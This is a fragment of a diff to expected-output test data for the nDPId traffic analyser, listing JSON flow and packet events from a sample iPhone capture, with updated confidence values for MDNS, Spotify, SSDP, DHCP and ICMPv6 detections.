-00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1219,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1219,"pkt_l4_len":1165,"thread_ts_msec":1582454553607,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBBI0R\/\/6AAAAAAAAAxCwD\/\/5gamT\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\/MH8AAwAAQAAEZQAAsHuwAwAIYABAAAAeAAIAAAAAMAAwOnBMwAhgAEAAAB4AAgAAAAAAb3A6cFvACGAAQAAAHgACAAAAAACJMDpwbIAIYABAAAAeAAIAAAAAAAWwOnB7gAhgAEAAAB4AAgAAAAAABbA6Q1MdWNh4oCZcyBpTWFjBF9uZnPAIQAQgAEAABGUAAEAwGsADAABAAARlAACwqHCoQAMAAEAABGUAALCk8KTACGAAQAAAHgACAAAAAAIAcDpDUx1Y2HigJlzIGlNYWMPX2NvbXBhbmlvbi1saW5rwCEAEIABAAARlABYFnJwQkE9NTk6NTE6MDI6MkY6QTQ6RkYKcnBWcj0xNTIuMRFycEhJPTA3MTZkMDU5NDRhZhFycEhOPThiNTMyNDM1OWQ3ZBFycEhBPTI4ZDRiZWQ1MTc4MMBrAAwAAQAAEZQAAsLxwvEADAABAAARlAACwuPC4wAhgAEAAAB4AAgAAAAAwAPA6cDpAAGAAQAAAHgABMCoAgHA6QAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpkwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAwOkAL4ABAAAAeAAIwOkABEAAAAgAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="} -00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"luca???s_imac._odisk._tcp.local"}} +00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":1582454553607,"pkt":"AQBeAAD72DBiVgAcCABFAAS+xrMAAP8Rg6ip\/uHY4AAA+xTpFOkEqgnaAACEAAAAACAAAAAKDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\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\/uHYwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAw5UAL4ABAAAAeAAGw5UAAgAIwOkAL4ABAAAAeAAFwOkAAUAAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/tgwYlYAHA=="} 
-00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454556158,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454556158,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABITwkAAEARpUvAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"AQBeAAD7xiwDYGpkCABFAAGGV\/AAAP8RvtHAqAIB4AAA+xTpFOkBcvWXAAAAAAARAAEAAAABCF9haXJwb3J0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAENX2FwcGxlLW1vYmRldsAVAAwAAQg4ZmIyMDdkZQRfc3ViDl9hcHBsZS1tb2JkZXYywBUADAABD19hcHBsZS1wYWlyYWJsZcAVAAwAAQtfZ29vZ2xlY2FzdMAVAAwAAQZfdXNjYW7AFQAMAAEHX3VzY2Fuc8AVAAwAAQdfaXBwdXNiwBUADAABCF9zY2FubmVywBUADAABBF9pcHDAFQAMAAEFX2lwcHPAFQAMAAEIX3ByaW50ZXLAFQAMAAEPX3BkbC1kYXRhc3RyZWFtwBUADAABBF9wdHDAFQAMAAEEX3JmYsAVAAwAAQZfYWRpc2vAFQAMAAHAJQAMAAEAAA4KABANTHVjYeKAmXMgaU1hY8AlAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="} 00952{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\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\/sYsA2BqZA=="} 00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"AQBeAAD72DBiVgAcCABFAAGGSisAAP8RA2mp\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"} 
@@ -31,63 +31,63 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454583649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454583649,"pkt":"AQBeAAD7xiwDYGpkCABFAABJLHMAAAER6YzAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454585624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454585624,"pkt":"AQBef\/\/62DBiVgAcCABFAACab\/sAAP8Rz4Wp\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454585625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454585625,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaYI8AAAERpiDAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454586170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454586170,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIdggAAEARfkzAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 00953{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454586688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"thread_ts_msec":1582454586688,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\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\/sYsA2BqZA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454595352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454595352,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXQAAP8RB87AqAIBwKgCEQBDAEQBNJWvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 
+00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1582454595354,"pkt":"MzP\/mKKcxGGLNYKpht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/mKKchwBApQAAAAD+gAAAAAAAAAgjPxeCmKKcDgEq29a5HEA="} 
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
